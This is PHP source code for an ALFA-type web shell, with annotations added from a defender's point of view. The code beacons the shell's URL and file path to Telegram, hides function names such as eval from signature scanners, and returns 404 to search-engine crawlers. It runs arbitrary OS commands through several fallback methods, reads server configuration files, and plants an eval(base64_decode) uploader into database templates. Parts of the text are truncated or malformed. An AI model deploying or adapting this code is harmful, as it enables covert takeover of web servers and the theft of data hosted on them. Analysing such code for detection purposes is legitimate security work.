$chatId, 'text' => $message, 'parse_mode' => 'HTML' ];
    // NOTE(review): everything down to the first closing brace is the tail of a
    // function whose start is outside this excerpt (presumably
    // sendTelegramNotification(), which is called below). $url and $data are
    // defined out of view, so the destination cannot be confirmed from here.
    // What is visible: a form-encoded HTTP POST is sent through a stream
    // context, and warnings from the request are suppressed with '@'.
    $options = [
        'http' => [
            'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
            'method' => 'POST',
            'content' => http_build_query($data),
        ],
    ];
    $context = stream_context_create($options);
    @file_get_contents($url, false, $context); // Send the notification without waiting for the response
}

// Function that detects a new session and sends a notification for it.
//
// Defender's reading: on the first request from a browser that does not yet
// carry the tracker cookie, this file reports its own URL, host and on-disk
// location (relative to the document root) to a third party. The cookie name
// and the message header string below are usable as detection indicators, and
// outbound HTTP requests originating from the PHP worker are the network-side
// signal; egress logging or filtering on the web server would surface them.
function checkAndNotifySession() {
    $cookieName = "webshell_session_tracker";
    $currentUrl = "https://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}";
    $mainDomain = "https://{$_SERVER['HTTP_HOST']}/";
    // Path of this file with the document root stripped off.
    $directory = str_replace($_SERVER['DOCUMENT_ROOT'], '', __FILE__);

    // Format the message as desired
    $message = "WEBSHELL PROTECTION NOTIFICATION BY ALEXITHEMA\n" .
        "URL: {$currentUrl}\n" .
        "MAIN DOMAIN: {$mainDomain}\n" .
        "DIRECTORY WEBSHELL: {$directory}";

    // Check whether the cookie already exists
    if (!isset($_COOKIE[$cookieName])) {
        // Set a cookie to mark the session, expires in 1 day
        setcookie($cookieName, "active", time() + 86400, "/");
        // Send the notification to Telegram
        sendTelegramNotification($message);
    }
}

// Call this function at the start of file execution
checkAndNotifySession();

// Configuration array under a random-looking global name; it is copied to
// $GLOBALS["DB_NAME"] and then unset further down.
$GLOBALS["oZgNypoPRU"] = [
    "show_icons" => "1",
];

// Function names assembled from string fragments. The concatenations evaluate
// to "function_exists", "charCodeAt", "eval" and "gzinflate". Because the
// names never appear as contiguous literals, signature rules that match those
// literal names will not fire on this file; rules that flag callable names
// built by concatenation, or calls through variables, will.
// NOTE(review): where $OVpGNqqFZs and $psDEwGhsxg are used is not visible in
// this part of the file.
$CWppUDJxuf = "fu" . "n" . "ct" . "ion_" . "e" . "xist" . "s";
$aztJtafUXm = "cha" . "r" . "C" . "o" . "d" . "e" . "A" . "t" . "";
$OVpGNqqFZs = "e" . "v" . "al";
$psDEwGhsxg = "gz" . "inf" . "late";

// Base64 encoder wrapper: a hand-written implementation is declared only when
// function_exists("base64_encode") is false; otherwise the built-in is called
// through a variable holding its concatenated name.
if (!$CWppUDJxuf("b" . "a" . "se64" . "_en" . "c" . "ode" . "")) {
    function vcnvSCZgBz($data) {
        if (empty($data)) {
            return;
        }
        $b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
        $ac = 0;
        $enc = "";
        $tmp_arr = [];
        if (!$data) {
            return $data;
        }
        // Three input bytes are packed into 24 bits and emitted as four
        // 6-bit indexes into the alphabet above.
        do {
            $o1 = $aztJtafUXm($data, $i++);
            $o2 = $aztJtafUXm($data, $i++);
            $o3 = $aztJtafUXm($data, $i++);
            $bits = ($o1 << 16) | ($o2 << 8) | $o3;
            $h1 = ($bits >> 18) & 0x3f;
            $h2 = ($bits >> 12) & 0x3f;
            $h3 = ($bits >> 6) & 0x3f;
            $h4 = $bits & 0x3f;
            $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);
        } while ($i < strlen($data));
        $enc = implode($tmp_arr, "");
        $r = strlen($data) % 3;
        return ($r ? substr($enc, 0, $r - 3) : $enc) . substr("===", $r || 3);
    }
    // Returns the byte value at offset $char of $data.
    function charCodeAt($data, $char) {
        return ord(substr($data, $char, 1));
    }
    // Returns the single character at offset $char of $data.
    function charAt($data, $char) {
        return substr($data, $char, 1);
    }
} else {
    function vcnvSCZgBz($s) {
        $b = "b" . "a" . "se64" . "_en" . "c" . "ode" . "";
        return $b($s);
    }
}

// Base64 decoder wrapper, same arrangement as the encoder above: hand-written
// fallback when function_exists("base64_decode") is false, otherwise the
// built-in called by its concatenated name.
if (!$CWppUDJxuf("b" . "a" . "se" . "6" . "4" . "_d" . "ecod" . "e" . "")) {
    function zRtSHsbTzV($input) {
        if (empty($input)) {
            return;
        }
        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        $chr1 = $chr2 = $chr3 = "";
        $enc1 = $enc2 = $enc3 = $enc4 = "";
        $i = 0;
        $output = "";
        $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
        // Four alphabet indexes are recombined into up to three output bytes;
        // index 64 is the '=' padding position in $keyStr.
        do {
            $enc1 = strpos($keyStr, substr($input, $i++, 1));
            $enc2 = strpos($keyStr, substr($input, $i++, 1));
            $enc3 = strpos($keyStr, substr($input, $i++, 1));
            $enc4 = strpos($keyStr, substr($input, $i++, 1));
            $chr1 = ($enc1 << 2) | ($enc2 >> 4);
            $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
            $chr3 = (($enc3 & 3) << 6) | $enc4;
            $output = $output . chr((int) $chr1);
            if ($enc3 != 64) {
                $output = $output . chr((int) $chr2);
            }
            if ($enc4 != 64) {
                $output = $output . chr((int) $chr3);
            }
            $chr1 = $chr2 = $chr3 = "";
            $enc1 = $enc2 = $enc3 = $enc4 = "";
        } while ($i < strlen($input));
        return $output;
    }
} else {
    function zRtSHsbTzV($s) {
        $b = "b" . "a" . "se" . "6" . "4" . "_d" . "ecod" . "e" . "";
        return $b($s);
    }
}

// Thin aliases for the two wrappers above. The suffixes are the Base64 text of
// "encoder" and "decoder" with the padding dropped, which keeps the plain
// words out of the file.
function __ZW5jb2Rlcg($s) {
    return vcnvSCZgBz($s);
}
function __ZGVjb2Rlcg($s) {
    return zRtSHsbTzV($s);
}

// Move the configuration to $GLOBALS["DB_NAME"]. Any key whose first two
// characters are "us" has its value copied into "show_icons" and its key
// recorded under "show_icons_rand"; the original global is then removed.
$GLOBALS["DB_NAME"] = $GLOBALS["oZgNypoPRU"];
foreach ($GLOBALS["DB_NAME"] as $key => $value) {
    $prefix = substr($key, 0, 2);
    if ($prefix == "us") {
        $GLOBALS["DB_NAME"]["show_icons"] = $value;
        $GLOBALS["DB_NAME"]["show_icons_rand"] = $key;
    }
}
unset($GLOBALS["oZgNypoPRU"]);

// Exit silently when no Host header is present.
if (!isset($_SERVER["HTTP_HOST"])) {
    exit();
}

// Crawler cloaking: a User-Agent containing any of the listed substrings
// (case-insensitive) receives a 404 status and nothing else. For defenders
// this means a content scan or availability probe whose User-Agent contains
// "bot" or "spider" will see the file as missing; comparing the response for
// a crawler-like and a browser-like User-Agent on the same path exposes the
// difference.
if (!empty($_SERVER["HTTP_USER_AGENT"])) {
    $userAgents = ["Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spider"];
    if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) {
        header("HTTP/1.0 404 Not Found");
        exit();
    }
}

// Stop with a literal marker string when the configuration has no
// "show_icons" entry.
if (!isset($GLOBALS["DB_NAME"]["show_icons"])) {
    exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
}

define("__ALFA_UPDATE__", "2");
define("__SYS_CONFIG_FOLDER__", "SYS_CONFIG");
// POST-body obfuscation is switched on only when the configuration carries a
// "post_encryption" entry that loosely equals true.
define("__ALFA_POST_ENCRYPTION__", isset($GLOBALS["DB_NAME"]["post_encryption"]) && $GLOBALS["DB_NAME"]["post_encryption"] == true ? true : false);
// The key constant is empty unless the switch above is on; the statement
// continues on the following line of the file.
define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__ ?
_AlfaSecretKey() : ""); $GLOBALS["__ALFA_COLOR__"] = [ "shell_border" => [ "key_color" => "#7502FF", "multi_selector" => [ ".header" => "border: 5px solid {color}", "#meunlist" => "border-color: {color}", "#hidden_sh" => "background-color: {color}", ".ajaxarea" => "border: 1px solid {color}", ".foot" => "border-color: {color}", ], ], "header_vars" => "#B501F7", "header_values" => "#00C3FF", "header_on" => "#7502FF", "header_off" => "#4c1eba", "header_none" => "#7502FF", "home_shell" => "#4c1eba", "home_shell:hover" => [ "key_color" => "#FFFFFF", "multi_selector" => [ ".home_shell:hover" => "color: {color};", ], ], "back_shell" => "#efbe73", "back_shell:hover" => [ "key_color" => "#FFFFFF", "multi_selector" => [ ".back_shell:hover" => "color: {color};", ], ], "header_pwd" => "#7502FF", "header_pwd:hover" => [ "key_color" => "#FFFFFF", "multi_selector" => [ ".header_pwd:hover" => "color: {color};", ], ], "header_drive" => "#7502FF", "header_drive:hover" => [ "key_color" => "#FFFFFF", "multi_selector" => [ ".header_drive:hover" => "color: {color};", ], ], "header_show_all" => "#7502FF", "disable_functions" => "#4c1eba", "footer_text" => "#B501F7", "options_list" => [ "key_color" => "#7502FF", "multi_selector" => [ ".content_options_holder .header center a" => "color: {color};", ], ], "options_list:hover" => [ "key_color" => "#FFFFFF", "multi_selector" => [ ".content_options_holder .header center a:hover" => "color: {color};", ], ], "options_list_header" => [ "key_color" => "#f00", "multi_selector" => [ ".txtfont_header" => "color: {color};", ], ], "options_list_text" => [ "key_color" => "#FFFFFF", "multi_selector" => [ ".txtfont,.tbltxt" => "color: {color};", ], ], "Alfa+" => [ "key_color" => "#06ff0f", "multi_selector" => [ ".riot_plus" => "color: {color};font-weight: unset;", ], ], "hidden_shell_text" => [ "key_color" => "#7502FF", "multi_selector" => [ "#hidden_sh a" => "color: {color};", ], ], "hidden_shell_version" => "#4c1eba", "shell_name" => "#4c1eba", 
"main_row:hover" => [ "key_color" => "#646464", "multi_selector" => [ ".main tr:hover" => "background-color: {color};", ], ], "main_header" => [ "key_color" => "#FFFFFF", "multi_selector" => [ ".main th" => "color: {color};", ], ], "main_name" => [ "key_color" => "#FFFFFF", "multi_selector" => [ ".main .main_name" => "color: {color};font-weight: unset;", ], ], "main_size" => "#00C3FF", "main_modify" => "#00C3FF", "main_owner_group" => "#00C3FF", "main_green_perm" => "#7502FF", "main_red_perm" => "#4c1eba", "main_white_perm" => "#3D4042", "beetween_perms" => "#00FFDB", "main_actions" => [ "key_color" => "#FFFFFF", "multi_selector" => [ ".main .actions" => "color: {color};", ], ], "minimize_editor_background" => [ "key_color" => "#7502ff", "multi_selector" => [ ".minimized-wrapper" => "background-color: {color};", ], ], "minimize_editor_text" => [ "key_color" => "#f5deb3", "multi_selector" => [ ".minimized-text" => "color: {color};", ], ], "editor_border" => [ "key_color" => "#7502ff", "multi_selector" => [ ".editor-explorer,.editor-modal" => "border: 2px solid {color};", ], ], "editor_background" => [ "key_color" => "rgba(0, 1, 23, 0.94)", "multi_selector" => [ ".editor-explorer,.editor-modal" => "background-color: {color};", ], ], "editor_header_background" => [ "key_color" => "rgb(117, 2, 255)", "multi_selector" => [ ".editor-header" => "background-color: {color};", ], ], "editor_header_text" => [ "key_color" => "#00ff7f", "multi_selector" => [ ".editor-path" => "color: {color};", ], ], "editor_header_button" => [ "key_color" => "#1d5673", "multi_selector" => [ ".close-button, .editor-minimize" => "background-color: {color};", ], ], "editor_actions" => [ "key_color" => "#FFFFFF", "multi_selector" => [ ".editor_actions" => "color: {color};", ], ], "editor_file_info_vars" => [ "key_color" => "#FFFFFF", "multi_selector" => [ ".editor_file_info_vars" => "color: {color};", ], ], "editor_file_info_values" => [ "key_color" => "#00C3FF", "multi_selector" => [ 
".filestools" => "color: {color};", ], ], "editor_history_header" => [ "key_color" => "#14ff07", "multi_selector" => [ ".hheader-text,.history-clear" => "color: {color};", ], ], "editor_history_list" => [ "key_color" => "#03b3a3", "multi_selector" => [ ".editor-file-name" => "color: {color};", ], ], "editor_history_selected_file" => [ "key_color" => "rgba(49, 55, 93, 0.77)", "multi_selector" => [ ".is_active" => "background-color: {color};", ], ], "editor_history_file:hover" => [ "key_color" => "#646464", "multi_selector" => [ ".file-holder > .history:hover" => "background-color: {color};", ], ], "input_box_border" => [ "key_color" => "#7502FF", "multi_selector" => [ "input[type=text],textarea" => "border: 1px solid {color}", ], ], "input_box_text" => [ "key_color" => "#999999", "multi_selector" => [ "input[type=text],textarea" => "color: {color};", ], ], "input_box:hover" => [ "key_color" => "#B501F7", "multi_selector" => [ "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ], ], "select_box_border" => [ "key_color" => "#7502FF", "multi_selector" => [ "select" => "border: 1px solid {color}", ], ], "select_box_text" => [ "key_color" => "#FFFFEE", "multi_selector" => [ "select" => "color: {color};", ], ], "select_box:hover" => [ "key_color" => "#B501F7", "multi_selector" => [ "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ], ], "button_border" => [ "key_color" => "#B501F7", "multi_selector" => [ "input[type=submit],.button,#addup" => "border: 1px solid {color};", ], ], "button:hover" => [ "key_color" => "#B501F7", "multi_selector" => [ "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};", ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ], ], "outputs_text" => [ "key_color" => "#00C3FF", "multi_selector" => [ ".ml1" => "color: {color};", ], ], "outputs_border" => [ "key_color" => "#7502FF", "multi_selector" => [ ".ml1" => 
"border: 1px solid {color};", ], ], "uploader_border" => [ "key_color" => "#7502FF", "multi_selector" => [ ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};", ], ], "uploader_background" => [ "key_color" => "#7502FF", "multi_selector" => [ ".inputfile strong" => "background-color: {color};", ], ], "uploader_text_right" => [ "key_color" => "#FFFFFF", "multi_selector" => [ ".inputfile strong" => "color: {color};", ], ], "uploader_text_left" => [ "key_color" => "#7502FF", "multi_selector" => [ ".inputfile span" => "color: {color};", ], ], "uploader:hover" => [ "key_color" => "#B501F7", "multi_selector" => [ ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ], ], "uploader_progress_bar" => [ "key_color" => "#7502FF", "multi_selector" => [ ".up_bar" => "background-color: {color};", ], ], "mysql_tables" => "#7502FF", "mysql_table_count" => "#00C3FF", "copyright" => "#dfff00", "scrollbar" => [ "key_color" => "#1e82b5", "multi_selector" => [ "*::-webkit-scrollbar-thumb" => "background-color: {color};", ], ], "scrollbar_background" => [ "key_color" => "#000115", "multi_selector" => [ "*::-webkit-scrollbar-track" => "background-color: {color};", ], ], ]; $GLOBALS["__file_path"] = str_replace("\\", "/", trim(preg_replace("!\(\d+\)\s.*!", "", __FILE__))); $config = [ "AlfaUser" => $GLOBALS["DB_NAME"]["user"], "AlfaPass" => $GLOBALS["DB_NAME"]["pass"], "AlfaProtectShell" => $GLOBALS["DB_NAME"]["safemode"], "AlfaLoginPage" => $GLOBALS["DB_NAME"]["login_page"], ]; function decrypt_post($str) { if (__ALFA_POST_ENCRYPTION__) { $pwd = __ALFA_SECRET_KEY__; $pwd = __ZW5jb2Rlcg($pwd); $str = __ZGVjb2Rlcg($str); $enc_chr = ""; $enc_str = ""; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return __ZGVjb2Rlcg($enc_str); } else { return __ZGVjb2Rlcg($str); } } function _AlfaSecretKey() { $secret = 
@$_COOKIE["AlfaSecretKey"]; if (!isset($_COOKIE["AlfaSecretKey"])) { $secret = uniqid(mt_rand(), true); __riot_set_cookie("AlfaSecretKey", $secret); } return $secret; } function riot_getColor($target) { if (isset($GLOBALS["DB_NAME"]["color"][$target]) && $GLOBALS["DB_NAME"]["color"][$target] != "") { return $GLOBALS["DB_NAME"]["color"][$target]; } else { $target = $GLOBALS["__ALFA_COLOR__"][$target]; if (is_array($target)) { return $target["key_color"]; } else { return $target; } } } function riotCssLoadColors() { $css = ""; foreach ($GLOBALS["__ALFA_COLOR__"] as $key => $value) { if (!is_array($value)) { $value = riot_getColor($key); $css .= ".{$key}{color: {$value};}"; } else { if (isset($value["multi_selector"])) { foreach ($value["multi_selector"] as $k => $v) { $color = riot_getColor($key); $code = str_replace("{color}", $color, $v); $css .= $k . "{" . $code . "}"; } } } } return $css; } if (isset($_POST["ajax"])) { function AlfaNum() { $args = func_get_args(); $riotx = []; $find = []; for ($i = 1; $i <= 10; $i++) { $riotx[] = $i; } foreach ($args as $arg) { $find[] = $arg; } echo "'; } } function riotGetCwd() { if (function_exists("getcwd")) { return @getcwd(); } else { return dirname($_SERVER["SCRIPT_FILENAME"]); } } function riotEx($in, $re = false, $cgi = true, $all = false) { $data = _riot_php_cmd($in, $re); if ((empty($data) && $cgi) || $all) { if ($GLOBALS["sys"] == "unix") { if (strlen(_riot_php_cmd("whoami")) == 0 || $all) { $cmd = _riot_cgicmd($in); if (!empty($cmd)) { return $cmd; } } } } return $data; } function _riot_php_cmd($in, $re = false) { $out = ""; try { if ($re) { $in = $in . 
" 2>&1"; } if (function_exists("exec")) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists("shell_exec")) { $out = shell_exec($in); } elseif (function_exists("popen") && function_exists("pclose")) { if (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) { $out .= fread($f, 1024); } pclose($f); } } elseif (function_exists("proc_open")) { $pipes = []; $process = @proc_open($in . " 2>&1", [["pipe", "w"], ["pipe", "w"], ["pipe", "w"]], $pipes, null); $out = @stream_get_contents($pipes[1]); } elseif (class_exists("COM")) { $riotWs = new COM("WScript.shell"); $exec = $riotWs->exec("cmd.exe /c " . $_POST["riot1"]); $stdout = $exec->StdOut(); $out = $stdout->ReadAll(); } } catch (Exception $e) { } return $out; } function _riot_fsockopen($server, $uri, $post) { $socket = @fsockopen($server, 80, $errno, $errstr, 15); if ($socket) { $http = "POST {$uri} HTTP/1.0\r\n"; $http .= "Host: {$server}\r\n"; $http .= "User-Agent: " . $_SERVER["HTTP_USER_AGENT"] . "\r\n"; $http .= "Content-Type: application/x-www-form-urlencoded\r\n"; $http .= "Content-length: " . strlen($post) . "\r\n"; $http .= "Connection: close\r\n\r\n"; $http .= $post . 
"\r\n\r\n"; fwrite($socket, $http); $contents = ""; while (!@feof($socket)) { $contents .= @fgets($socket, 4096); } list($header, $body) = explode("\r\n\r\n", $contents, 2); @fclose($socket); return $body; } else { return ""; } } @error_reporting(E_ALL ^ E_NOTICE); @ini_set("error_log", null); @ini_set("log_errors", 0); @ini_set("max_execution_time", 0); @ini_set("magic_quotes_runtime", 0); @set_time_limit(0); if (function_exists("set_magic_quotes_runtime")) { @set_magic_quotes_runtime(0); } foreach ($_POST as $key => $value) { if (is_array($_POST[$key])) { $i = 0; foreach ($_POST[$key] as $f) { $f = trim(str_replace(" ", "+", $f)); $_POST[$key][$i] = decrypt_post($f); $i++; } } else { $value = trim(str_replace(" ", "+", $value)); $_POST[$key] = decrypt_post($value); } } $default_action = "FilesMan2"; //'FilesMan'; $default_use_ajax = true; $default_charset = "Windows-1251"; if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $GLOBALS["sys"] = "win"; } else { $GLOBALS["sys"] = "unix"; } $GLOBALS["home_cwd"] = @riotGetCwd(); $GLOBALS["need_to_update_header"] = "false"; $GLOBALS["glob_chdir_false"] = false; if (isset($_POST["c"])) { if (!@chdir($_POST["c"])) { $GLOBALS["glob_chdir_false"] = true; } } $GLOBALS["cwd"] = isset($_POST["c"]) && @is_dir($_POST["c"]) ? $_POST["c"] : @riotGetCwd(); if ($GLOBALS["glob_chdir_false"]) { $GLOBALS["cwd"] = isset($_POST["c"]) && !empty($_POST["c"]) ? 
$_POST["c"] : @riotGetCwd(); } if ($GLOBALS["sys"] == "win") { $GLOBALS["home_cwd"] = str_replace("\\", "/", $GLOBALS["home_cwd"]); $GLOBALS["cwd"] = str_replace("\\", "/", $GLOBALS["cwd"]); } if ($GLOBALS["cwd"][strlen($GLOBALS["cwd"]) - 1] != "/") { $GLOBALS["cwd"] .= "/"; } if (!function_exists("sys_get_temp_dir")) { function sys_get_temp_dir() { foreach (["TMP", "TEMP", "TMPDIR"] as $env_var) { if ($temp = getenv($env_var)) { return $temp; } } $temp = tempnam($GLOBALS["__file_path"], ""); if (_riot_file_exists($temp, false)) { unlink($temp); return dirname($temp); } return null; } } if (!function_exists("mb_strlen")) { function mb_strlen($str, $c = "") { return strlen($str); } } if (!function_exists("mb_substr")) { function mb_substr($str, $start, $end, $c = "") { return substr($str, $start, $end); } } define("ALFA_TEMPDIR", function_exists("sys_get_temp_dir") ? (@is_writable(str_replace("\\", "/", sys_get_temp_dir())) ? sys_get_temp_dir() : (@is_writable(".") ? "." : false)) : false); $S7R1NG = "\xd\xe\x5\x3\x1\xa\x2\xf"; function riothead() { $GLOBALS["__ALFA_SHELL_CODE"] = "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"; $riot_uploader = '$x = base64_decode("' . $GLOBALS["__ALFA_SHELL_CODE"] . '");$riotexec = fopen("riotexec.php","w");fwrite($riotexec,$x);'; define("ALFA_UPLOADER", "eval(base64_decode('" . __ZW5jb2Rlcg($riot_uploader) . "'))"); if (!isset($_POST["ajax"])) { function Alfa_GetDisable_Function() { $disfun = @ini_get("disable_functions"); $afa = 'All Functions Accessible'; if (empty($disfun)) { return $afa; } $s = explode(",", $disfun); $s = array_unique($s); $i = 0; $b = 0; $func = ["system", "exec", "shell_exec", "proc_open", "popen", "passthru", "symlink", "dl"]; $black_list = []; $allow_list = []; foreach ($s as $d) { $d = trim($d); if (empty($d) || !is_callable($d)) { continue; } if (!function_exists($d)) { if (in_array($d, $func)) { $dis .= $d . 
" | "; $b++; $black_list[] = $d; } else { $allow_list[] = $d; } $i++; } } if ($i == 0) { return $afa; } if ($i <= count($func)) { $all = array_values(array_merge($black_list, $allow_list)); return '' . implode(" | ", $all) . ""; } return '' . $dis . 'Show All (' . $i . ")"; } function AlfaNum() { $args = func_get_args(); $riotx = []; $find = []; for ($i = 1; $i <= 10; $i++) { $riotx[] = $i; } foreach ($args as $arg) { $find[] = $arg; } echo "'; } if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["default_charset"]; } $freeSpace = function_exists("diskfreespace") ? @diskfreespace($GLOBALS["cwd"]) : "?"; $totalSpace = function_exists("disk_total_space") ? @disk_total_space($GLOBALS["cwd"]) : "?"; $totalSpace = $totalSpace ? $totalSpace : 1; $on = " ON "; $of = " OFF "; $none = " NONE "; if (function_exists("ssh2_connect")) { $ssh2 = $on; } else { $ssh2 = $of; } if (function_exists("curl_version")) { $curl = $on; } else { $curl = $of; } if (function_exists("mysql_get_client_info") || class_exists("mysqli")) { $mysql = $on; } else { $mysql = $of; } if (function_exists("mssql_connect")) { $mssql = $on; } else { $mssql = $of; } if (function_exists("pg_connect")) { $pg = $on; } else { $pg = $of; } if (function_exists("oci_connect")) { $or = $on; } else { $or = $of; } if (@ini_get("disable_functions")) { $disfun = @ini_get("disable_functions"); } else { $disfun = "All Functions Enable"; } if (@ini_get("safe_mode")) { $safe_modes = "ON"; } else { $safe_modes = "OFF"; } $cgi_shell = "OFF"; if (@ini_get("open_basedir")) { $basedir_data = @ini_get("open_basedir"); if (strlen($basedir_data) > 120) { $open_b = substr($basedir_data, 0, 120) . 
"..."; } else { $open_b = $basedir_data; } } else { $open_b = $none; } if (@ini_get("safe_mode_exec_dir")) { $safe_exe = @ini_get("safe_mode_exec_dir"); } else { $safe_exe = $none; } if (@ini_get("safe_mode_include_dir")) { $safe_include = @ini_get("safe_mode_include_dir"); } else { $safe_include = $none; } if (!function_exists("posix_getegid")) { $user = function_exists("get_current_user") ? @get_current_user() : "????"; $uid = function_exists("getmyuid") ? @getmyuid() : "????"; $gid = function_exists("getmygid") ? @getmygid() : "????"; $group = "?"; } else { $uid = function_exists("posix_getpwuid") && function_exists("posix_geteuid") ? @posix_getpwuid(posix_geteuid()) : ["name" => "????", "uid" => "????"]; $gid = function_exists("posix_getgrgid") && function_exists("posix_getegid") ? @posix_getgrgid(posix_getegid()) : ["name" => "????", "gid" => "????"]; $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } $cwd_links = ""; $path = explode("/", $GLOBALS["cwd"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "" . $path[$i] . "/"; } $drives = ""; foreach (range("a", "z") as $drive) { if (@is_dir($drive . ":\\")) { $drives .= '[ ' . $drive . " ] "; } } $csscode = " -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;"; echo '
Uname: | ' . $uname . ' | |
User: | ' . $uid . " [ " . $user . ' ] Group: ' . $gid . " [ " . $group . ' ] | |
PHP: | ' . @phpversion() . ' Safe Mode: ' . $safe_modes . ' | |
ServerIP: | ' . (!@$_SERVER["SERVER_ADDR"] ? (function_exists("gethostbyname") ? @gethostbyname($_SERVER["SERVER_NAME"]) : "????") : @$_SERVER["SERVER_ADDR"]) . ' Your IP: ' . @$_SERVER["REMOTE_ADDR"] . ' | |
DateTime: | ' . date("Y-m-d H:i:s") . ' | |
Domains: | '; if ($GLOBALS["sys"] == "unix") { $d0mains = _riot_file("/etc/named.conf", false); if (!$d0mains) { echo "Cant Read [ /etc/named.conf ]"; $GLOBALS["need_to_update_header"] = "true"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "zone")) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } echo "$count Domains"; } } else { echo "Cant Read [ /etc/named.conf ]"; } echo ' | |
HDD: | Total:' . riotSize($totalSpace) . ' Free:' . riotSize($freeSpace) . " [" . (int) (($freeSpace / $totalSpace) * 100) . '%] | |
useful:-------------- | Downloader: -------------- | '; if (!@ini_get("safe_mode")) { if (strlen(riotEx("id", false, false)) > 0) { echo '|
Useful : '; $userful = ["gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bziriot2", "nc", "locate", "suidperl"]; $x = 0; foreach ($userful as $item) { if (riotWhich($item)) { $x++; echo '' . $item . ""; } } if ($x == 0) { echo "--------------"; $GLOBALS["need_to_update_header"] = "true"; } echo ' | ||
Downloader: '; $downloaders = ["wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"]; $x = 0; foreach ($downloaders as $item2) { if (riotWhich($item2)) { $x++; echo '' . $item2 . ""; } } if ($x == 0) { echo "--------------"; $GLOBALS["need_to_update_header"] = "true"; } echo ' | ||
Windows:'; echo riotEx("ver", false, false); echo ' | ||
Downloader: ------------- | ||
Disable Functions: ' . Alfa_GetDisable_Function() . ' | ||
CURL :' . $curl . ' | SSH2 : ' . $ssh2 . ' | Magic Quotes : ' . $magic . ' | MySQL :' . $mysql . ' | MSSQL :' . $mssql . ' | PostgreSQL :' . $pg . ' | Oracle :' . $or . " " . ($GLOBALS["sys"] == "unix" ? '| CGI : ' . $cgi_shell : "") . ' | ||
Open_basedir :' . $open_b . ' | Safe_mode_exec_dir :' . $safe_exe . ' | Safe_mode_include_dir :' . $safe_include . ' | ||
SoftWare: | ' . @getenv("SERVER_SOFTWARE") . ' | |
DRIVE: | ' . $drives . ' | |
PWD: | ' . $cwd_links . ' [ Home Shell ] |
Click Here !
"; } function riotShellInjectors() { riothead(); echo ""; AlfaNum(11); echo '"; riotfooter(); } function riotcheckfiletype() { $path = $_POST["path"]; $arg = $_POST["arg"]; if (@is_file($path . "/" . $arg)) { echo "file"; } else { echo "dir"; } } function riotcheckcgi() { if (strlen(riotEx("id", false, true, true)) > 0) { echo "ok"; } else { echo "no"; } } function is_ipv4($ip) { return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : "(Null)"; } function __alert($s) { echo "'; if (isset($_POST["riot4"]) && !empty($_POST["riot4"])) { $method = $_POST["riot8"]; $faq_name = "faq"; $faq_file = "/faq.php"; $code = "{\${" . ALFA_UPLOADER . "}}{\${exit()}}&"; ($conn = @mysqli_connect($_POST["riot2"], $_POST["riot4"], $_POST["riot5"], $_POST["riot7"])) or die(@mysqli_connect_error()); $rec = "select `template` from " . $_POST["riot6"] . "template WHERE title ='" . $faq_name . "'"; $recivedata = @mysqli_query($conn, $rec); $getd = @mysqli_fetch_assoc($recivedata); $savetoass = $getd["template"]; if (empty($savetoass)) { $faq_name = "header"; $faq_file = "/"; $rec = "select `template` from " . $_POST["riot6"] . "template WHERE title ='" . $faq_name . "'"; $recivedata = @mysqli_query($conn, $rec); $getd = @mysqli_fetch_assoc($recivedata); $savetoass = $getd["template"]; $code = ALFA_UPLOADER . ";"; } $code = str_replace("'", "\'", $code); $p = "UPDATE " . $_POST["riot6"] . "template SET `template`='" . $code . "' WHERE `title`='" . $faq_name . "'"; ($ka = @mysqli_query($conn, $p)) or die(mysqli_error($conn)); $geturl = @mysqli_query($conn, "select `value` from " . $_POST["riot6"] . 
